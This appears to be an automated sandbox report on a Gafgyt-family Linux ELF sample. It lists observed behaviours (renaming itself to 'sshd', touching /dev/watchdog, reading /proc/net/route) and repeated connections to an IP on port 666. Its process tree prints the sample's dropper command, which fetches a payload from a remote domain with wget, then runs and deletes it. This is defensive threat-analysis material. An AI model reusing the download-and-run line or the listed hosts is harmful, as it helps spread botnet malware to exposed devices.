Analysis Overview
SHA256
8dba2039fd6f20170d4f1046a5a9d3413c58a657ce34658f5681e07296263d95
Threat Level: Known bad
The file 8dba2039fd6f20170d4f1046a5a9d3413c58a657ce34658f5681e07296263d95.elf was found to be: Known bad.
Malicious Activity Summary
Detected Gafgyt variant
Gafgyt family
Modifies Watchdog functionality
Changes its process name
Executes dropped EXE
Reads system routing table
Reads system network configuration
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-02 01:15
Signatures
Detected Gafgyt variant
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Gafgyt family
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-02 01:15
Reported
2024-04-02 01:18
Platform
debian9-armhf-20240226-en
Max time kernel
148s
Max time network
141s
Command Line
Signatures
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | sshd | /tmp/8dba2039fd6f20170d4f1046a5a9d3413c58a657ce34658f5681e07296263d95.elf | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/..... | /tmp/..... | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/watchdog | N/A | N/A |
| File opened for modification | /dev/misc/watchdog | N/A | N/A |
Reads system routing table
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/8dba2039fd6f20170d4f1046a5a9d3413c58a657ce34658f5681e07296263d95.elf | N/A |
Reads system network configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/8dba2039fd6f20170d4f1046a5a9d3413c58a657ce34658f5681e07296263d95.elf | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/..... | /usr/bin/wget | N/A |
Processes
/tmp/8dba2039fd6f20170d4f1046a5a9d3413c58a657ce34658f5681e07296263d95.elf
[/tmp/8dba2039fd6f20170d4f1046a5a9d3413c58a657ce34658f5681e07296263d95.elf]
/bin/sh
[/bin/sh -c wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf .....]
/usr/bin/wget
[wget -q http://gay.energy/.../vivid -O .....]
/bin/chmod
[chmod 777 .....]
/tmp/.....
[./.....]
/bin/sh
[/bin/sh ./.....]
/bin/rm
[rm -rf .....]
Network
| Country | Destination | Domain | Proto |
| MD | 85.239.33.129:666 | tcp | |
| US | 1.1.1.1:53 | gay.energy | udp |
| US | 1.1.1.1:53 | gay.energy | udp |
| MD | 85.239.33.129:666 | tcp | |
| MD | 85.239.33.129:666 | tcp | |
| MD | 85.239.33.129:666 | tcp | |
| MD | 85.239.33.129:666 | tcp | |
| MD | 85.239.33.129:666 | tcp | |
| MD | 85.239.33.129:666 | tcp | |
| MD | 85.239.33.129:666 | tcp | |
| MD | 85.239.33.129:666 | tcp | |
| MD | 85.239.33.129:666 | tcp |